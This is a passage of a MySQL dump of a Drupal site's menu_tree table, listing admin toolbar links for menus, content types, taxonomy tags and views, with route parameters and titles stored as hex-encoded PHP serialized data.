('admin', 106, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.admin', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=admin', 0x613a313a7b733a343a226d656e75223b733a353a2261646d696e223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a353a2261646d696e223b7d, 1, 4, 6, 10, 17, 106, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 107, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.admin', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.admin', 'entity.menu.add_link_form', 'menu=admin', 0x613a313a7b733a343a226d656e75223b733a353a2261646d696e223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 106, 107, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 108, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.footer', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=footer', 0x613a313a7b733a343a226d656e75223b733a363a22666f6f746572223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a363a22666f6f746572223b7d, 1, 4, 6, 10, 17, 108, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 109, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.footer', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.footer', 'entity.menu.add_link_form', 'menu=footer', 0x613a313a7b733a343a226d656e75223b733a363a22666f6f746572223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 108, 109, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 110, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.main', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=main', 0x613a313a7b733a343a226d656e75223b733a343a226d61696e223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a343a226d61696e223b7d, 1, 4, 6, 10, 17, 110, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 111, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.main', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.main', 'entity.menu.add_link_form', 'menu=main', 0x613a313a7b733a343a226d656e75223b733a343a226d61696e223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 110, 111, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 112, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.tools', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=tools', 0x613a313a7b733a343a226d656e75223b733a353a22746f6f6c73223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 4, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a353a22746f6f6c73223b7d, 1, 4, 6, 10, 17, 112, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 113, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.tools', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.tools', 'entity.menu.add_link_form', 'menu=tools', 0x613a313a7b733a343a226d656e75223b733a353a22746f6f6c73223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 112, 113, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 114, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.account', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=account', 0x613a313a7b733a343a226d656e75223b733a373a226163636f756e74223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a373a226163636f756e74223b7d, 1, 4, 6, 10, 17, 114, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 115, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.account', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.account', 'entity.menu.add_link_form', 'menu=account', 0x613a313a7b733a343a226d656e75223b733a373a226163636f756e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 114, 115, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 116, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a373a2261727469636c65223b7d, 1, 4, 6, 10, 18, 116, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 117, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldsarticle', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.node.field_ui_fields', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 116, 117, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 118, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultarticle', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.entity_form_display.node.default', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 116, 118, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 119, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.article', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.entity_view_display.node.default', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 116, 119, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 120, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.article', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.node_type.entity_permissions_form', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 116, 120, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 121, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.article', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.article', 'entity.node_type.delete_form', 'node_type=article', 0x613a313a7b733a393a226e6f64655f74797065223b733a373a2261727469636c65223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 116, 121, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 122, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a343a2270616765223b7d, 1, 4, 6, 10, 18, 122, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 123, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldspage', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.node.field_ui_fields', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 122, 123, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 124, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultpage', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.entity_form_display.node.default', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 122, 124, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 125, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.page', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.entity_view_display.node.default', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 122, 125, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm');
INSERT INTO `menu_tree` (`menu_name`, `mlid`, `id`, `parent`, `route_name`, `route_param_key`, `route_parameters`, `url`, `title`, `description`, `class`, `options`, `provider`, `enabled`, `discovered`, `expanded`, `weight`, `metadata`, `has_children`, `depth`, `p1`, `p2`, `p3`, `p4`, `p5`, `p6`, `p7`, `p8`, `p9`, `form_class`) VALUES
('admin', 126, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.page', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.node_type.entity_permissions_form', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 122, 126, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 127, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.page', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.page', 'entity.node_type.delete_form', 'node_type=page', 0x613a313a7b733a393a226e6f64655f74797065223b733a343a2270616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 122, 127, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 128, 'admin_toolbar_tools.extra_links:node.type_add', 'entity.node_type.collection', 'node.type_add', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a2241646420636f6e74656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -2, 0x613a303a7b7d, 0, 4, 6, 10, 18, 128, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 129, 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.taxonomy_vocabulary.collection', 'entity.taxonomy_vocabulary.overview_form', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a393a22656e746974795f6964223b733a343a2274616773223b7d, 1, 4, 6, 10, 19, 129, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 130, 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.edit_form.tags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.taxonomy_vocabulary.edit_form', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2245646974223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 130, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 131, 'admin_toolbar_tools.extra_links:entity.taxonomy_term.field_ui_fieldstags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.taxonomy_term.field_ui_fields', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 131, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 132, 'admin_toolbar_tools.extra_links:entity.entity_form_display.taxonomy_term.defaulttags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.entity_form_display.taxonomy_term.default', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 132, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 133, 'admin_toolbar_tools.extra_links:entity.entity_view_display.taxonomy_term.default.tags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.entity_view_display.taxonomy_term.default', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 133, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 134, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.taxonomy_term.default.tags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.taxonomy_vocabulary.entity_permissions_form', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 134, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 135, 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.delete_form.tags', 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.overview_form.tags', 'entity.taxonomy_vocabulary.delete_form', 'taxonomy_vocabulary=tags', 0x613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a343a2274616773223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 19, 129, 135, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 136, 'admin_toolbar_tools.extra_links:entity.taxonomy_vocabulary.add_form', 'entity.taxonomy_vocabulary.collection', 'entity.taxonomy_vocabulary.add_form', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a2241646420766f636162756c617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -998, 0x613a303a7b7d, 0, 4, 6, 10, 19, 136, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 137, 'admin_toolbar_tools.extra_links:views_ui.add', 'entity.view.collection', 'views_ui.add', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224164642076696577223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -5, 0x613a303a7b7d, 0, 4, 6, 10, 20, 137, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 139, 'admin_toolbar_tools.extra_links:views_ui.block_content', 'entity.view.collection', 'entity.view.edit_form', 'view=block_content', 0x613a313a7b733a343a2276696577223b733a31333a22626c6f636b5f636f6e74656e74223b7d, '', 0x733a31343a22436f6e74656e7420626c6f636b73223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 139, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 140, 'admin_toolbar_tools.extra_links:views_ui.comment', 'entity.view.collection', 'entity.view.edit_form', 'view=comment', 0x613a313a7b733a343a2276696577223b733a373a22636f6d6d656e74223b7d, '', 0x733a383a22436f6d6d656e7473223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 140, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 141, 'admin_toolbar_tools.extra_links:views_ui.comments_recent', 'entity.view.collection', 'entity.view.edit_form', 'view=comments_recent', 0x613a313a7b733a343a2276696577223b733a31353a22636f6d6d656e74735f726563656e74223b7d, '', 0x733a31353a22526563656e7420636f6d6d656e7473223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 141, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 142, 'admin_toolbar_tools.extra_links:views_ui.content', 'entity.view.collection', 'entity.view.edit_form', 'view=content', 0x613a313a7b733a343a2276696577223b733a373a22636f6e74656e74223b7d, '', 0x733a373a22436f6e74656e74223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 142, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
